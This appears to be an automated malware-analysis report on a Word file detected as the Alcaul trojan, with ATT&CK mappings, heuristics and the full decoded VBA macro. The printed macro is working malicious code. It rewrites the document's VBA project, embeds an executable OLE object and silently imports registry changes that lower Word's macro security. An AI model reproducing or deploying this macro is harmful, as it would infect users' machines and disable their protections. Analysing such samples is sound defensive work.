MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1204.002 Malicious File
T1137.001 DLL Search Order Hijacking
The VBA macro executes a Document_Open subroutine which writes a script to 'c:\xploit.txt', then attempts to insert this script into the current document's VBA project. It also adds an OLE object 'c:\click2X.com' and modifies registry keys to lower Word's macro security settings, enabling further execution. Finally, it executes 'regedit /s c:\vv.reg' to apply these changes.
Heuristics 5
-
ClamAV: Doc.Trojan.Alcaul-21 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Alcaul-21
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1499 bytes |
SHA-256: ee19a7af7ecdf5dfea3438fc2f445aea5a43dadce15d2463fad091f456b2ec14 |
|||
|
Detection
ClamAV:
Win.Trojan.Alcaul-20
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub document_close()
On Error Resume Next
Open "c:\xploit.txt" For Output As 2
Print #2, "sub document_open()"
Print #2, "On Error Resume Next"
Print #2, "'by alcopaul"
Print #2, "obj = ActiveDocument.Shapes(1).OLEFormat.ClassType"
Print #2, "With ActiveDocument.Shapes(1).OLEFormat"
Print #2, " .ActivateAs ClassType:=obj"
Print #2, " .Activate"
Print #2, "End With"
Print #2, "end sub"
Close 2
Set fso = CreateObject("Scripting.FileSystemObject")
Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\xploit.txt", 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
ActiveDocument.Shapes.AddOLEObject _
FileName:="c:\click2X.com", _
LinkToFile:=False
ActiveDocument.Save
Open "c:\vv.reg" For Output As 3
Print #3, "REGEDIT4"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #3, """Level""=dword:00000001"
Print #3, """AccessVBOM""=dword:00000001"
Close 3
Shell "regedit /s c:\vv.reg", vbHide
Kill "c:\vv.reg"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.